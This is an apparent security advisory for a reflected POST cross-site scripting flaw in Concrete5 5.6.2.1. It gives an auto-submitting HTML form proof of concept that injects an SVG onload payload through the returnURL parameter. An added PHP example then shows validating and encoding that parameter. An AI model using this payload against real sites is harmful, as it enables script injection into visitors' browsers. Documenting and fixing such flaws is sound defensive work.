
Concrete 5.6.2.1 POST XSS

Author: Osanda Malith Jayathissa, Published: 19-07-2014
Title: Concrete 5.6.2.1 POST XSS
Vendor: http://www.concrete5.org/
Author: Osanda Malith Jayathissa (@OsandaMalith)
E-Mail: osanda [cat] unseen.is
Video: https://www.youtube.com/watch?v=XMttXL9v4bE
Original write-up: http://osandamalith.wordpress.com/2014/07/18/concrete-5-6-2-1-multiple-xss

[+] POC
---------

<html>
<body>
<form name="exploit" action="http://localhost/index.php/download_file" method="POST">
<input type="hidden" name="returnURL" value="&quot;&gt;&lt;svg&#47;onload&#61;confirm&#40;&apos;Hello&apos;&#41;&gt;" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
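
Defensive handling of the returnURL parameter, as an added example that is not part of the original advisory and is not concrete5's own code. It assumes, from the `">` prefix of the PoC value, that returnURL is reflected into a quoted HTML attribute; the function names `safe_return_url` and `attr` are hypothetical.

```php
<?php
// Added example (assumption-based): validate returnURL, then encode it on output.

/**
 * Accept returnURL only when it is a same-site, path-only reference;
 * anything else is replaced by a fixed default.
 */
function safe_return_url(string $raw, string $default = '/'): string
{
    // Must start with "/", and contain no control characters or backslashes.
    if ($raw === '' || $raw[0] !== '/' || preg_match('/[\x00-\x1F\x7F\\\\]/', $raw)) {
        return $default;
    }
    // "//host/path" is scheme-relative and would leave the site.
    if (strncmp($raw, '//', 2) === 0) {
        return $default;
    }
    // Refuse anything that still parses with a scheme or host.
    $parts = parse_url($raw);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $default;
    }
    return $raw;
}

/** Encode a value for a quoted HTML attribute (both quote styles). */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The returnURL value from the PoC above, with its HTML entities decoded.
$poc = "\"><svg/onload=confirm('Hello')>";

// A legitimate value, constructed for this example.
$ok = '/index.php/files?page=2';

foreach ([$poc, $ok] as $value) {
    // Output encoding alone keeps the value inside the attribute.
    echo 'encoded only : <input type="hidden" name="returnURL" value="',
        attr($value), '">', "\n";
    // Validation first, then encoding: the PoC value falls back to "/".
    echo 'validated    : <input type="hidden" name="returnURL" value="',
        attr(safe_return_url($value)), '">', "\n";
}
```

Encoding at the point of output is what closes the injection; the validation step additionally keeps returnURL from pointing off-site.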
